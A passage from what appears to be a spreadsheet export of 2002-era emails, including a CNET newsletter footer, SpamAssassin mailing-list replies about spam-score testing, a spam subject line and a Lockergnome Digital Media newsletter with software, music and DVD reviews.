 &lt;table width=3D"612" bgcolor=3D"#000000" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" heig=
 ht=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"601"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#ffcc00" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.g=
 if" width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"10" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"37"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3De5-9Z7OQg=
 yslCOTgwGjnbcumX6cvbuR" &gt;&lt;img src=3D"http://www.cnet.com/i/dp/smrb.gif" wid=
 th=3D"37" height=3D"37" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D"563" nowrap&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dfa-FmqNQhO1bO6LU5PtvDA4oSM=
 poLsR" &gt;&lt;font color=3D"#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D0f-RM2lIqjD91rKD7csUb9HGRJ=
 1bfZR" &gt;&lt;font color=3D"#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D24-8DdMIczi7pJ6R5fgeUef92i=
 qrwdR" &gt;&lt;font color=3D"#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D39-7QgMIjIiVp_1FThCGLs-y39=
 w-_cR" &gt;&lt;font color=3D"#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D4e-0Y95InZ3aFtmiVkIKlsTn8N=
 _JjiR" &gt;&lt;font color=3D"#000000"&gt;All CNET services&lt;/font&gt;&lt;/a&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" cellpadding=3D"0" cellspacing=3D"0" border=3D"0"&gt;
 &lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D=
 "1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td height=3D"25"&gt;&lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;&lt;tab=
 le width=3D100% border=3D0 cellspacing=3D2 cellpadding=3D1&gt; &lt;tr valign=3Dbo=
 ttom&gt; &lt;td width=3D75% height=3D31&gt; &lt;p&gt;&lt;/font&gt; &lt;br&gt;&lt;b&gt;&lt;font face=3DArial, He=
 lvetica, sans-serif size=3D2&gt;    Copyright 2002 CNET Networks, Inc. All rig=
 hts reserved.    &lt;/font&gt;&lt;/b&gt; &lt;/p&gt;&lt;/td&gt;&lt;td height=3D31 valign=3Dtop&gt; &lt;div al=
 ign=3Dright&gt; &lt;img src=3D"http://gserv-cnet.zdnet.com/clear/outbound.gif?APP=
 ID=3D2&amp;EMID=3D25136487&amp;NL=3De433&amp;ISSUE=3D2002-07-20" height=3D1 width=3D1&gt; =
    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, san=
 s-serif size=3D2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3D64-U=
 BDhncLhcuhJIfc7SQcQsa8RL9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Lowest life insurance rates available!                                                   hsdpr
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] phew! 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Matt Kettler said:
 &gt; Ok, first, the important stuff. Happy birthday Justin (a lil late, but
 &gt; oh well)
 cheers!
 &gt; a 13% miss ratio on the spam corpus at 5.0 seems awfully high, although 
 &gt; that nice low FP percentage is quite nice, as is the narrow-in of average 
 &gt; FP/FN scores compared to 2.40.
 As Dan said -- it's a hard corpus, made harder without the spamtrap data.
 Also -- and this is an important point -- those measurements can't be
 directly compared, because I changed the methodology.  In 2.40 the scores
 were evolved on the entire corpus, then evaluated using that corpus; ie.
 there was no "blind" testing, and the scores could overfit and still
 provide good statistics.
 In 2.42, they're evaluated "blind", on a totally unseen set of messages,
 so those figures would be a lot more accurate for real-world use.
 --j.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/digitalmedia/20020715.html"&gt;
       http://www.lockergnome.com/issues/digitalmedia/20020715.html
       &lt;/a&gt;
       To unsubscribe, please e-mail the following address:
       leave-lgmedia-2534370N@sprocket.lockergnome.com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scrollbar-3dlight-color: #DEE8EC; scrollbar-arrow-color: #000000; scrollbar-base-color: #007C7A; scrollbar-darkshadow-color: #507686; scrollbar-face-color: #A9C4CF; scrollbar-highlight-color: #DEE8EC; scrollbar-shadow-color: #507686 }
  a:link    { COLOR: #0000FF; TEXT-DECORATION: underline; font-weight: normal }
  a:visited { COLOR: #000000; TEXT-DECORATION: underline; font-weight: normal }
  a:active  { color: #000000; TEXT-DECORATION: none }
  a:hover   { color: #26343A; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 4px solid; BORDER-LEFT: #DEE8EC 4px solid; BORDER-RIGHT: #507686 4px solid; BORDER-TOP: #DEE8EC 4px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.news    { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 4px solid; BORDER-LEFT: #DEE8EC 4px solid; BORDER-RIGHT: #507686 4px solid; BORDER-TOP: #DEE8EC 4px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 18pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 3px solid; BORDER-LEFT: #DEE8EC 3px solid; BORDER-RIGHT: #507686 3px solid; BORDER-TOP: #DEE8EC 3px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold; TEXT-ALIGN: center }
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
 --&gt;
 &lt;/style&gt;&lt;title&gt;20020715 Lockergnome Digital Media&lt;/title&gt;&lt;/head&gt;
 &lt;body     MARGINHEIGHT="0" TOPMARGIN="0" BOTTOMMARGIN="0" bgcolor="#FFFFFF"     style="BACKGROUND-POSITION: right top; BACKGROUND-REPEAT: no-repeat" MARGINWIDTH="0" LEFTMARGIN="0" rightmargin="0" text="#26343A" alink="#008080" link="#0000FF" vlink="#26343A"&gt;
 &lt;!-- background="http://images.lockergnome.com/images/bg.head.gray.gif" bgcolor="#C0C0C0" left width="610" background="http://images.lockergnome.com/images/dn.back.top-r1.gif" --&gt;
  &lt;table width="100%" border="0" cellspacing="0" cellpadding="7" align="CENTER" valign="MIDDLE"&gt;
   &lt;tr&gt;&lt;td background="http://images.lockergnome.com/images/issue/top-left.gif" nowrap valign="middle" align="center" colspan="2"&gt;
  &lt;!-- TOP BANNER AD --&gt;
  &lt;!--#include virtual="/include/banner.txt"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&lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td valign="top" bgcolor="#FFFFFF"&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;!-- NEWS --&gt;
 &lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="news"&gt;
 &amp;nbsp;07.15.2002 MediaREPORT&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font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To all you Dream Theater fans out there, please accept my humblest of apologies. 
 I mistakenly announced their break up in the last GnomeAudio section, causing 
 quite a stir among a number of subscribers. In fact, they just released a double 
 album this year and have been touring in support of that release. 
 For today's false alarm, please make note of the tragedy that is the N'SYNC 
 breakup (oh wait, that's just wishful thinking).
 &lt;p&gt;
 I know I've already carried on about my Kyocera 6035 phone, but this thing is 
 awesome.  I've got all my contacts in one device. Web browsing is good - I'm 
 sure it would be better on a color screen, like the 
 &lt;a href="http://www.handspring.com/products/treo270/index.jhtml?sub_nav_section=Overview&amp;prod_cat_name=Treo270"&gt;Treo 270&lt;/a&gt;, but for what I'll need, 
 this works well. I'm currently looking for an ssh client I can install, so that 
 remote server logins will be possible. My one complaint is the base station's 
 use of a serial connector instead of USB, but I suppose they were cutting costs. 
 &lt;p&gt;
 I'm also scoping out the 
 &lt;a href="http://www.peanutpress.com/S=ed9724e6e001d4f7afd09fc34b785c41PTNCLsCoAAIAAGD6Ee43335503/makebook/index.cgi/pml"&gt;Palm Markup Language&lt;/a&gt; 
 (PML) standard for marking up Palm Docs, 
 in an effort to make the GnomeTomes a little flashier. I've installed several of 
 the files on my phone and while they are easy to read, have all the content 
 organized, and function as useful tips for the various subjects, I'd like to add 
 some minor tweaks to future tomes, so that they look even better for me and 
 anyone else who reads them on their Palm.  
 &lt;p align="right"&gt;&lt;font style="font-size: 22pt" face="Jake Ludington, Chris Pirillo, Comic Sans MS" size="5"&gt;Jake Ludington&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;
 &lt;!-- PRODUCER --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomePRODUCER&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;TomeRaider v2.0 [1673k] W98/W2K/Pocket PC/Palm $25&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.tomeraider.com/"&gt;http://www.tomeraider.com/&lt;/a&gt;&lt;p&gt;
 Of the formats Lockergnome uses for our GnomeTomes, TomeRaider is by far my 
 favorite. Designed with a feel similar to CHM, the TR format is quite easy 
 to read, as it places section titles in a pane separate from content, 
 allowing you, the reader, to navigate through our tips (or anything else) 
 with much greater ease than the linear format the other versions present. 
 The Windows version of the software is truly designed with ease of use in 
 mind. Creating ebooks for TomeRaider is a simple matter of combining a 
 modified set of HTML tags with the &lt;new&gt; designation for page breaks. The 
 only trick for Yankees like me is remembering that center is tagged centre 
 in the software.
 &lt;!-- FEATURE --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFEATURE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;The Herd of Star Wars Nerds&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.ifilm.com/ifilm/product/film_info/0,3699,2439321,00.html?cch=11"&gt;http://www.ifilm.com/ifilm/product/film_info/0,3699,2439321,00.html?cch=11&lt;/a&gt;&lt;p&gt;
 Triumph the dog is low-tech, he's not cute like the pets.com sock puppet, 
 but he manages to maintain a twisted appeal to fans of lowbrow comedy. In 
 this segment, Triumph makes a mockery of geeks standing in line for 
 Episode II. Whether you've been one of those geeks yourself, or you've 
 never understood why anyone would dress up and wait in line for a movie, 
 you'll still find this film amusing. 10 minutes was more than necessary 
 to get the point across, yet Triumph delivers enough one-liners 
 throughout to keep you watching all the way to the end.
 &lt;!-- SKIN --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSKIN&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- http://www.deskmod.com/backend/deskmod/ln.php --&gt;
 &lt;!-- Begin Featured Skin --&gt;
 &lt;span class="author"&gt;&lt;b&gt;Kids World for &lt;a title="DesktopX Website" target=_blank HREF="http://www.stardock.com/products/desktopx" &gt;DesktopX&lt;/a&gt;&lt;/b&gt; by Frogboy&lt;/span&gt;&lt;br&gt;
 &lt;img height=6 src="/images/blank.gif" width=1&gt;
 &lt;font size="1"&gt;Posted on 7/14/2002 12:35:00 AM  -- &amp;nbsp;&amp;nbsp; &lt;/font&gt;
 &lt;p align="center"&gt;&lt;center&gt;
 &lt;img BORDER=0 SRC="http://www.wincustomize.com/library/accounts/Frogboy/dx/tkids2002.jpg" ALT="Kids World by Frogboy"&gt;&lt;/center&gt;
 &lt;p&gt;&lt;/p&gt;&lt;p align="center"&gt;
 &lt;font size="2"&gt;
 [&lt;a title="Download Kids World" HREF="http://www.wincustomize.com/skins.asp?flags=skinid=1953|library=3|file=KidsWorld.dxtheme|p=lg" &gt;Download&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="View Large Image"  target=_blank HREF="http://www.wincustomize.com/library/accounts/Frogboy/dx/kids2002.jpg" &gt;Zoom&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="Visit WinCustomize" target=_blank HREF="http://www.wincustomize.com/skins.asp?library=3&amp;SkinID=1953" &gt;Visit WinCustomize&lt;/a&gt;]
 &lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;!-- End Featured Skin --&gt;
 &lt;!-- AUDIO --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeAUDIO&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Heleen van den Hombergh&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.heleenvandenhombergh.com/"&gt;http://www.heleenvandenhombergh.com/&lt;/a&gt;&lt;br&gt;
 &lt;a class="url" href="http://artists.mp3s.com/artists/378/heleen_van_den_hombergh.html"&gt;http://artists.mp3s.com/artists/378/heleen_van_den_hombergh.html&lt;/a&gt;&lt;p&gt;
 Classic jazz vocal styling, juxtaposing arrangements of contemporary 
 pieces with arrangements of jazz standards. Combined with some 
 beautiful piano arrangements, Heleen's voice is a thing of beauty. A 
 Netherlands native,  who originally dreamed of saving the rainforests 
 (at least according to her biography), her interpretation of American 
 jazz standards and show tunes is more remarkable than most native 
 English speaking vocalists. No world tour is currently scheduled, so 
 you'll probably have to journey to Europe to see her in person, but 
 for those of you living elsewhere in the world, the Internet makes a 
 fabulous venue for experiencing Heleen  van den Hombergh's talent. 
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;A BOOK FOR EVERY GEEK:&lt;/b&gt; Want to know more about 
 &lt;a href="http://www.gnometomes.com/tome/001826.html"&gt;networking&lt;/a&gt;? 
 Have you ever wanted to 
 &lt;a href="http://www.gnometomes.com/tome/001843.html"&gt;write an e-book&lt;/a&gt;? Maybe you need to polish 
 your 
 &lt;a href="http://www.gnometomes.com/tome/001829.html"&gt;Web design&lt;/a&gt; skills? Get full-length books from the Poor Richard's 
 series, including &lt;b&gt;Poor Richard's E-mail Publishing&lt;/b&gt;, by Chris Pirillo, at GnomeTomes.com, for 50% off the suggested retail price of the print versions. 
 &lt;a href="http://www.gnometomes.com"&gt;Click here&lt;/a&gt; to learn more.    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;!-- PLUGIN --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomePLUGIN&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Aezay Caption Draw v1.0 [71k] W9X/NT/W2K/XP FREE&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.winamp.com/plugins/detail.jhtml?componentId=112660"&gt;http://www.winamp.com/plugins/detail.jhtml?componentId=112660&lt;/a&gt;&lt;p&gt;
 Reminding me of creating captions for Webcam32, this application uses 
 incomprehensible string values to display relevant info about Winamp 
 songs in the Windows caption bar. List song names, time of day, 
 playlist information, filenames, and a variety of other more obscure 
 information. Changing caption colors is also doable within this 
 plug-in. A set of hot keys makes controlling Winamp from your keyboard 
 more functional, although you can't remap any of the keys.
 &lt;!-- DVD --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeDVD&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;table align="left" cellpadding="0" cellspacing="8" border="0" valign="top"&gt;&lt;tr&gt;&lt;td align="center"&gt;
 &lt;a href="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=111007501"&gt;&lt;img alt="DVD" border="0" width="94" height="140" src="http://images.lockergnome.com/images/dvd/themanwhowasntthere.jpg"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font style="font-size: 7pt" size="1" color="red" face="Verdana, Tahoma, Arial"&gt;Click for Details&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;The Man Who Wasn't There&lt;/b&gt; (R) 2001&lt;br&gt;
 Drama - 116min&lt;br&gt;
 Reviewer's Tilt (9)&lt;p&gt;
 &lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;
 &lt;p class="url"&gt;Special DVD Features worth a look-Thornton and Coen Brothers Commentary&lt;/p&gt;
 Much more film noir, than a movie trying to imitate film noir, The Man
 Who Wasn't There captures the inevitable hopelessness of the genre. Ed
 Crane (Billy Bob Thornton) is the archetype everyman. A barber by trade,
 Crane represents the individual in society. He hears everything, but
 truly knows nothing. Everything he hears is modified ever so slightly by
 the retelling. He gets neither the whole story nor the true motivations.
 Left to guess at the motivations and desires of those around him, Crane
 develops an indifference to it all. When a snake oil sales man slithers
 into town, Crane takes this opportunity to cheat the cheaters and punish
 the punishers.  As indifferent as Crane appears, he is no match for the
 amorality of fate. As much as fate is indifferent in its wrath, however,
 so is it artistic in its execution. That is what makes our lives so
 entertaining. Fate doles ultimate justice, but never as expected. The
 Man Who Wasn't There is truly a Kafkaesque tale of an individual's year
 to turn against the tide of inevitability. Atypical of cuter, more
 recent Coen brothers fare, this film is reminiscent of their earlier
 noir works like Blood Simple and Miller's Crossing. Frances McDormand
 does an outstanding job making as Crane's selfish wife and James
 Gandolfini exudes boorishness as Doris' boss. The real outstanding
 performances, however, rest with the supporting cast. Tony Shalhoub, as
 pompus attorney Freddy Riedenschneider and  Jon Polito as the snake oil
 salesman impress and entertain as cruel, but offbeat parodies of their
 characters. The black and white cinematography by Roger Deakins also
 impresses and precisely underscores the bleakness of Crane's life and
 the monochromatic nature of fate.
 &lt;ul&gt;
 &lt;li&gt;Region 1 Encoding (US and Canada only)
 &lt;li&gt;Format: B&amp;amp;W, Widescreen Anamorphic, Closed Captioned
 &lt;li&gt;Sound: Dolby Digital 5.1, Dolby Digital 2.0 Surround Spanish, Dolby Digital 2.0 Surround French
 &lt;li&gt;Billy Bob Thornton, Joel Coen and Ethan Coen Commentary
 &lt;li&gt;Deleted Scenes
 &lt;li&gt;Making-of Featurette
 &lt;li&gt;Interview with Director of Photography Roger Deakins
 &lt;li&gt;Photo Gallery
 &lt;li&gt;Trailers
 &lt;/ul&gt;
 &lt;p class="url" align="right"&gt;Review by &lt;a href="mailto:brett@lockergnome.com?subject=DVD Review Feedback"&gt;Brett Trout&lt;/a&gt;
 &lt;!-- WALLPAPER --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeWALLPAPER&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- http://www.deviantart.com/output/lockergnome_newsletter-skin.html --&gt;
 &lt;!-- Begin Featured Skin --&gt;
 &lt;span class="author"&gt;&lt;b&gt;Isolation for &lt;a title="Photo Manipulation  Website" target=_blank HREF="http://www.deskmod.com/?show=showcat&amp;cat_name=photo" &gt;Photo Manipulation&lt;/a&gt;&lt;/b&gt; by fake[x]&lt;/span&gt;&lt;br&gt;
 &lt;img height=6 src="images/blank.gif" width=1&gt;
 &lt;font size="1"&gt;Posted on  7/14/02 11:08PM  -- &amp;nbsp;&amp;nbsp; &lt;/font&gt;
 &lt;p align="center"&gt;
 &lt;center&gt;&lt;img BORDER=0 SRC="http://www.deskmod.com/backend/deskmod/lncache/12529.gif" ALT="Photo Manipulation by fake[x]"&gt;&lt;/center&gt;
 &lt;p&gt;&lt;/p&gt;&lt;p align="center"&gt;
 &lt;font size="2"&gt;
 [&lt;a title="Download Isolation" HREF="http://www.deskmod.com/?download=12529" &gt;Download&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="View Large Image"  target=_blank HREF="http://www.deskmod.com/?state=view&amp;skin_id=12529" &gt;Zoom&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="Visit DeskMod" target=_blank HREF="http://www.deskmod.com" &gt;Visit DeskMod&lt;/a&gt;]
 &lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;!-- End Featured Skin --&gt;
 &lt;!-- ADMINISTRIVIA --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;
 &lt;table bgcolor="#A9C4CF" cellpadding="7" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;a href="http://www.lockergnome.com/issues/digitalmedia/20020715.html"&gt;http://www.lockergnome.com/issues/digitalmedia/20020715.html&lt;/a&gt;&lt;br&gt;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HREF="http://www.gnomedex.com/"&gt;Geekathon 2002&lt;/A&gt;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HREF="http://lockergnome.pricegrabber.com/"&gt;The GnomeSHOPPER&lt;/A&gt;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&amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Recommend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href="http://www.lockergnome.com/submit.html"&gt;Submit Your Opinion&lt;/a&gt;&lt;br&gt;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HREF="http://www.amazon.com/exec/obidos/ASIN/0966103254/ref=ase_lockergnome/"&gt;Get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href="mailto:jake@lockergnome.com?subject=Lockergnome Digital Media Comment"&gt;E-mail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&lt;p&gt;&lt;br&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;table border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://www.lockergnome.com/webcam.html"&gt;
 &lt;img width="125" height="94" alt="Lockergnome Webcam Image" src="http://www.lockergnome.com/images/webcam/jakecam.jpg"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;font size="1" face="Tahoma,Arial"&gt;CLICK HERE TO ZOOM&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/font&gt;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class="sidebar"&gt;GNOMEMUSIC&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;table border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://www.netmusiccountdown.com"&gt;
 &lt;img border="0" alt="Net Music Countdown" src="http://images.lockergnome.com/images/nmclogo.gif"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;p&gt;&lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1s21go"
 target=_blank&gt;&lt;b&gt;Goo Goo Goes Disney&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 The Goo Goo Dolls have had some of their most successful songs come out of movies, so it's not a big leap to see...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1z17le"
 target=_blank&gt;&lt;b&gt;Lenny Paints Town Pink&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Lenny Kravitz and Pink are gearing up to hit the road. The U.S. leg of Lenny Live kicks off today in Virginia Beach...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1d41da"
 target=_blank&gt;&lt;b&gt;Up On the Roof&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Oh, the difference a preposition makes. Dave Matthews Band will launch their new album, Busted Stuff, on the Ed...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1w13li"
 target=_blank&gt;&lt;b&gt;Bow Wow Wants to Bark-Play-For Duke&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 The rapper formerly known as Lil (he's dropped the Lil) Bow Wow says he's like to play basketball in college and...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1n13wh"
 target=_blank&gt;&lt;b&gt;Whitney's New Song Leaked&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Whitney Houston needs a hit and she's hoping "Whatcha Lookin' At" is it. The song was leaked over New York radio...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1e10fa"
 target=_blank&gt;&lt;b&gt;Fat Joe in Bar Fight&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Rapper Fat Joe - real name Joseph Cartagena - is charged with breaking a man's jaw during a bar fight in B.B. King's... 
 &lt;p&gt;&amp;nbsp;&lt;p&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="100%" bgcolor="#FFEEDD"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;GNOMECREDITS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;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&lt;p&gt;&amp;nbsp;&lt;p&gt;&amp;nbsp;Search Past Issues:&lt;br&gt;
 &lt;img src="http://images.lockergnome.com/images/blank.gif"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
 &lt;center&gt;&lt;a href="http://www.gnomedex.com/"&gt;&lt;img src="http://www.lockergnome.com/images/ads/gnomedex_vert.gif" width="125" height="400" border="0"&gt;&lt;/a&gt;&lt;/center&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Reporting....
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;I currently have spam being filtered for about 50 users via spamd.
 &gt;Works perfectly!  However, is there anyone out there providing reports
 &gt;to their users about what was filetered?  Maybe just something like
 &gt;date/time, From, and subject?
 Yup! You can check: http://www.cs.ait.ac.th/laboratory/email/quarantine.shtml
 Though it uses procmail!
 Olivier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</si>
  <si>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
 Rick Moen &lt;rick@linuxmafia.com&gt; a crit:
 &gt; &gt; I'm confused. I thought it was GPL'ed and that 
 &gt; &gt; the money you paid SuSE was for your 60 day
 &gt; &gt; support or whatever? 
 &gt; Yes, you're confused.
